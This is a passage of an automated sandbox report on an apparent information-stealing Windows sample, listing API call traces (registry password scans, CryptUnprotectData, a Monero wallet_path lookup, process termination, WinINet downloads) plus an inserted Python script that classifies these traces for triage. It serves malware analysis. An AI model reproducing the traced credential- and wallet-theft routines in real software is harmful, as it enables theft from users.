                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 6c2feeab227d5f17b43db6bb559df484ae2203389f377199583d66a73c2c3bfb
                            • Instruction ID: 0ed96738b085100408cc3e33372ef15a009913495e8304ee711df128526d426f
                            • Opcode Fuzzy Hash: 6c2feeab227d5f17b43db6bb559df484ae2203389f377199583d66a73c2c3bfb
                            • Instruction Fuzzy Hash: 0B415B7291016C9BCB25EB78D849AED77B8FF48300F5489A5B60AD3250DF709F858B91
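The per-function API listings above are the most useful part of this report for an analyst: the GetEnvironmentVariableA / SetEnvironmentVariableA / LoadLibraryA sequence, the WinINet download-to-CreateFileA routine, the GetDesktopWindow / GetHGlobalFromStream screenshot routine, and the HKCU RegEnumValueA scan with StrStrA(…, "Password") in the function listed next. The following is an added example, not Joe Sandbox's code and not part of this report: a small Python triage script that parses these "• API.MODULE(args), ref: addr" lines, normalises the signed hex arguments the report prints (e.g. -00800100) to 32-bit values, names the Win32 constants that are certain from their position (HKEY_CURRENT_USER, KEY_READ, GENERIC_WRITE, CREATE_ALWAYS, INTERNET_OPEN_TYPE_DIRECT), and flags a function when its API set contains a whole behaviour chain. The sample trace is constructed from the listings on this page; the bracketed function labels and the capability names are my own, and chain matching on API co-occurrence is a heuristic, not proof of intent.

```python
import re
from collections import OrderedDict

# Constructed sample: API-trace lines copied from the per-function listings in this
# report. The bracketed function labels are my own (the report keys functions by
# opcode/instruction hash); everything after the bullet is as the report prints it.
SAMPLE_TRACE = """
[sub_8EA000]
• GetEnvironmentVariableA.KERNEL32(012F9100,00B19BD8,0000FFFF), ref: 008EA026
• lstrcat.KERNEL32(00000000,00914C50), ref: 008EA0BE
• SetEnvironmentVariableA.KERNEL32(012F9100,00000000), ref: 008EA12F
• LoadLibraryA.KERNEL32(012E6458), ref: 008EA143
[sub_8E6AF0]
• InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E6B2C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008E6B6A
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008E6B88
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6BA1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008E6BC6
[sub_904480]
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00900EC0), ref: 00904486
• GetDesktopWindow.USER32 ref: 00904490
• GetWindowRect.USER32(00000000,?), ref: 0090449D
• SelectObject.GDI32(00000000,00000000), ref: 009044CF
• GetHGlobalFromStream.COMBASE(00900EC0,?), ref: 00904546
[sub_8E7A00]
• Part of subcall function 008E77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7805
• Part of subcall function 008E77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E784A
• Part of subcall function 008E77D0: StrStrA.SHLWAPI(?,Password), ref: 008E78B8
• lstrcat.KERNEL32(00000000, : ), ref: 008E7ACF
"""

FUNC_RE = re.compile(r"^\[(?P<name>[^\]]+)\]$")
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants worth naming, keyed by (API, zero-based argument index).
KNOWN_ARGS = {
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER"},
    ("RegOpenKeyExA", 3): {0x00020019: "KEY_READ"},
    ("CreateFileA", 1): {0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 4): {0x2: "CREATE_ALWAYS"},
    ("InternetOpenA", 1): {0x1: "INTERNET_OPEN_TYPE_DIRECT"},
}

# Behaviour chains (labels are mine): every API in the set must occur in one function.
CAPABILITIES = {
    "download_url_to_file": {"InternetOpenUrlA", "InternetReadFile", "CreateFileA", "WriteFile"},
    "rewrite_env_then_loadlibrary": {"GetEnvironmentVariableA", "SetEnvironmentVariableA", "LoadLibraryA"},
    "screenshot_to_memory_stream": {"GetDesktopWindow", "GetWindowRect", "SelectObject", "GetHGlobalFromStream"},
    "registry_value_scan": {"RegOpenKeyExA", "RegEnumValueA", "StrStrA"},
}


def parse_arg(tok):
    """Args print as signed hex (e.g. -00800100), '?' for unresolved, or a literal."""
    tok = tok.strip()
    try:
        return int(tok, 16) & 0xFFFFFFFF   # normalise the signed display to a DWORD
    except ValueError:
        return tok                          # '?' or an inline string such as 'Password'


def parse_trace(text):
    """Return {function label: [call dict, ...]} in report order."""
    funcs, current = OrderedDict(), None
    for line in (l.strip() for l in text.splitlines()):
        if (m := FUNC_RE.match(line)):
            current = m.group("name")
            funcs[current] = []
        elif current is not None and (m := CALL_RE.match(line)):
            args = m.group("args")
            funcs[current].append({
                "api": m.group("api"), "module": m.group("module"),
                "args": [parse_arg(a) for a in args.split(",")] if args else [],
                "ref": int(m.group("ref"), 16),
            })
    return funcs


def annotate(call):
    """Name any argument that matches a known constant for this API."""
    return [f"{call['api']} arg{i}=0x{v:X} ({name})"
            for i, v in enumerate(call["args"])
            if (name := KNOWN_ARGS.get((call["api"], i), {}).get(v))]


def classify(funcs):
    """Map each function to the capability chains its API set fully contains."""
    out = OrderedDict()
    for label, calls in funcs.items():
        apis = {c["api"] for c in calls}
        out[label] = {
            "capabilities": sorted(cap for cap, need in CAPABILITIES.items() if need <= apis),
            "annotations": [n for c in calls for n in annotate(c)],
        }
    return out


if __name__ == "__main__":
    for label, info in classify(parse_trace(SAMPLE_TRACE)).items():
        print(label, info["capabilities"], *info["annotations"], sep="\n  ")
```

To run it against a full report, paste the "APIs" listings into the trace string with a bracketed label per function; KNOWN_ARGS and CAPABILITIES are plain dictionaries and are meant to be extended (for instance with CSIDL values for SHGetFolderPathA, where 0x1A is CSIDL_APPDATA). The script deliberately does not decode the -00800100 flag word passed to InternetOpenUrlA beyond normalising it, because the report's signed rendering does not map cleanly onto a single documented INTERNET_FLAG_* combination.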
                            APIs
                              • Part of subcall function 008E77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7805
                              • Part of subcall function 008E77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E784A
                              • Part of subcall function 008E77D0: StrStrA.SHLWAPI(?,Password), ref: 008E78B8
                              • Part of subcall function 008E77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E78EC
                              • Part of subcall function 008E77D0: HeapFree.KERNEL32(00000000), ref: 008E78F3
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008E7A90
                            • lstrcat.KERNEL32(00000000,?), ref: 008E7ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 008E7ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 008E7AF0
                            • wsprintfA.USER32 ref: 008E7B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E7B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E7B47
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008E7B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 4e4642ad2766a1412f63b860b938a391804ac22aa6b128c20e5a7aef050c90f5
                            • Instruction ID: e5be4dc69c9885120c0869d2076b7d1f27edab5e5efcb92b6c14c08047b75c86
                            • Opcode Fuzzy Hash: 4e4642ad2766a1412f63b860b938a391804ac22aa6b128c20e5a7aef050c90f5
                            • Instruction Fuzzy Hash: 56316276A04298EFCB10DBA9DC489EFB779FBC9714F648519E90AD3200DF70A941CB60
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F834C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8383
                            • lstrlen.KERNEL32(00000000), ref: 008F83A0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F83D7
                            • lstrlen.KERNEL32(00000000), ref: 008F83F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F842B
                            • lstrlen.KERNEL32(00000000), ref: 008F8448
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8477
                            • lstrlen.KERNEL32(00000000), ref: 008F8491
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F84C0
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 24ec387ee0a4abd5ab490ad3b6a913ff8defbbaf673a26460029c8b7d50ff6df
                            • Instruction ID: 6c1c4b7f084af91a3d956f703142c9b3a44268c15194e558937f4409ec6d1cb6
                            • Opcode Fuzzy Hash: 24ec387ee0a4abd5ab490ad3b6a913ff8defbbaf673a26460029c8b7d50ff6df
                            • Instruction Fuzzy Hash: 97515C71500217EBDB14AF39D848AABB7A8FF15300F108564AD06EB245EF70E960CBD0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E784A
                            • StrStrA.SHLWAPI(?,Password), ref: 008E78B8
                              • Part of subcall function 008E7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E775E
                              • Part of subcall function 008E7750: RtlAllocateHeap.NTDLL(00000000), ref: 008E7765
                              • Part of subcall function 008E7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E778D
                              • Part of subcall function 008E7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E77AD
                              • Part of subcall function 008E7750: LocalFree.KERNEL32(?), ref: 008E77B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E78EC
                            • HeapFree.KERNEL32(00000000), ref: 008E78F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008E7A35
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: ddf03ea2b7c74ee7def9551414a286161d9c90a8841d613214b8962603cf01c5
                            • Instruction ID: e937cc2d32d06ffbcfd589890d531492f688ae4d671a5e916a7d055958a1ec8d
                            • Opcode Fuzzy Hash: ddf03ea2b7c74ee7def9551414a286161d9c90a8841d613214b8962603cf01c5
                            • Instruction Fuzzy Hash: 36711EB1D0025DABDB10DF95DC80ADEBBB8FF49300F5085A9E609E7241EB359A85CB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,008F5099), ref: 00904755
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0090475C
                            • wsprintfW.USER32 ref: 0090476B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009047DA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009047E9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 009047F0
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: 29a68149efe899474509ae8dfc177fd6967306be4319faf417bc3ef877aa0848
                            • Instruction ID: 0e650841d5ea72b6a94ee39320c8f810aac78d635fa86ff075ff859ea7e25955
                            • Opcode Fuzzy Hash: 29a68149efe899474509ae8dfc177fd6967306be4319faf417bc3ef877aa0848
                            • Instruction Fuzzy Hash: 2C312B72A10249BBDB20DBE4DC89FDEB77CBF49B01F108455FA05E7180DB70AA418BA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1173
                            • RegCloseKey.ADVAPI32(?), ref: 008E117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 008E114F
                            • wallet_path, xrefs: 008E116D
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: c07d011bbfc43d418473e30d27caf8a731198fe3f3ece461b80bf936883d5939
                            • Instruction ID: c97991adc3831d270f3ea0d3af62ccdf3a989130b945405345ff2fc8e938d12d
                            • Opcode Fuzzy Hash: c07d011bbfc43d418473e30d27caf8a731198fe3f3ece461b80bf936883d5939
                            • Instruction Fuzzy Hash: 7BF03A75B40348BBEB109BA1AC4EFEB7B7CEB49B55F104154FF05E3280EAB05A4487A1
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 008E9E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 008E9E42
                            • LocalAlloc.KERNEL32(00000040), ref: 008E9EA7
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • lstrcpy.KERNEL32(00000000,00914C4C), ref: 008E9FB2
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 528e234e43748df755fa9f58625d161b1ca2676ed0e95b35a2b99f26cb2a1726
                            • Instruction ID: 5ab95cbbdb477a358152b5d3269def89b4b30d6acc4de6a31543256b75901bb4
                            • Opcode Fuzzy Hash: 528e234e43748df755fa9f58625d161b1ca2676ed0e95b35a2b99f26cb2a1726
                            • Instruction Fuzzy Hash: 9751D232A10299ABCB10EFAADC41BDE77A8FF46314F054024F949EB251DBB0ED018BD1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E5661
                            • InternetOpenA.WININET(0090CFF4,00000000,00000000,00000000,00000000), ref: 008E5677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 008E5692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008E56BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 008E56E1
                            • InternetCloseHandle.WININET(?), ref: 008E56FA
                            • InternetCloseHandle.WININET(00000000), ref: 008E5701
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 616afd99f8e79d3cb24471674179ff97982e4b2a65e984fc77218c1c66e1ce20
                            • Instruction ID: f29d091ebe42c6093e5dbe9a0afcd13b79ee4c2c1dfbce6490dba5f3360c8c72
                            • Opcode Fuzzy Hash: 616afd99f8e79d3cb24471674179ff97982e4b2a65e984fc77218c1c66e1ce20
                            • Instruction Fuzzy Hash: 66419170A00245EFDB14CF56DC88F9AB7B4FF49705F54C069E918DB2A1DB719942CB90
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904969
                            • Process32First.KERNEL32(00000000,00000128), ref: 00904979
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090498B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009049AC
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009049BB
                            • CloseHandle.KERNEL32(00000000), ref: 009049C2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009049D0
                            • CloseHandle.KERNEL32(00000000), ref: 009049DB
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                            • Instruction ID: 14fdd9cefa5550aff8578928a819e978db1fda52ca8eebd7bfab52ddb27fb829
                            • Opcode Fuzzy Hash: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                            • Instruction Fuzzy Hash: 9D01B5B16412146FE7215B609C8DFEB77BCEB08B51F404591FA09D21C1DF70DE908AA5
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE727
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008EE7BA
                            • FindClose.KERNEL32(00000000), ref: 008EE7C9
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction ID: 761e99f49c55bcffe0cb0aa0d0a61b73297cc130db596d998a364554bb34dde2
                            • Opcode Fuzzy Hash: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction Fuzzy Hash: 37023B70A012959FDB68CF1AC594B65BBE1FF46714B19C0ADD809DB3A2DB72DC82CB40
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8575
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F85AC
                            • lstrlen.KERNEL32(00000000), ref: 008F85F2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8629
                            • lstrlen.KERNEL32(00000000), ref: 008F863F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F866E
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F867E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 25a00b2b02eb2107b26e1564d4d97e1910188360bfd4842cbb433e3eeff73b06
                            • Instruction ID: 47dd5d3447909cfbea3f2d829ada5f6a50400e1d7f4f52d0e9fb3d50d52f4e77
                            • Opcode Fuzzy Hash: 25a00b2b02eb2107b26e1564d4d97e1910188360bfd4842cbb433e3eeff73b06
                            • Instruction Fuzzy Hash: 71517C7590020ADBDB20DF78D988AABBBB9FF59304B248459EC86DB245EF34D9418B50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902AF5
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902AFC
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,00902A79), ref: 00902B1B
                            • RegQueryValueExA.ADVAPI32(00902A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902B35
                            • RegCloseKey.ADVAPI32(00902A79), ref: 00902B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 5fa500c5e34a7cae498cb732061363c507390b3b1035caec37b2bdb632c813fb
                            • Instruction ID: cae5d885408e0813538709698b4733071d77daad9fa0c6b03ec535024abee5f9
                            • Opcode Fuzzy Hash: 5fa500c5e34a7cae498cb732061363c507390b3b1035caec37b2bdb632c813fb
                            • Instruction Fuzzy Hash: 4501B175A00258AFD310DBA4DC5DFEB7BBCEB49B05F204098FE49D7280EA315A058790
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902A65
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902A6C
                              • Part of subcall function 00902AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902AF5
                              • Part of subcall function 00902AE0: RtlAllocateHeap.NTDLL(00000000), ref: 00902AFC
